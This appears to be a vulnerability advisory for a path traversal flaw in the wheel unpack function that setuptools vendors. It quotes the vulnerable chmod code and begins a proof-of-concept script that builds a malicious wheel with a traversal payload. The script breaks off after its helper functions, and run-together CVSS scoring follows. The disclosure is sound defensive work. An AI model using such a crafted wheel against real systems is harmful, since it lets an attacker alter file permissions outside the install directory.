The vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path.
# Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel)
for zinfo in wf.filelist:
wf.extract(zinfo, destination) # (1) Extraction is handled safely by zipfile
# (2) VULNERABILITY:
# The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'.
# If zinfo.filename contains "../", this targets files outside the destination.
permissions = zinfo.external_attr >> 16 & 0o777
destination.joinpath(zinfo.filename).chmod(permissions)
I have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack.
Prerequisites: pip install setuptools
Step 1: Generate the Malicious Wheel (gen_poc.py)
This script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list.
import zipfile
import hashlib
import base64
import os
def urlsafe_b64encode(data):
"""
Helper function to encode data using URL-safe Base64 without padding.
Required by the Wheel file format specification.
"""
return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')
def get_hash_and_size(data_bytes):
"""
Calculates SHA-256 hash and size of the data.
These values are required to construct a valid 'RECORD' file,
which is used by the 'wheel'...
0.46.2Exploitability
AV:LAC:LPR:NUI:RScope
S:UImpact
C:NI:HA:H7.1/CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H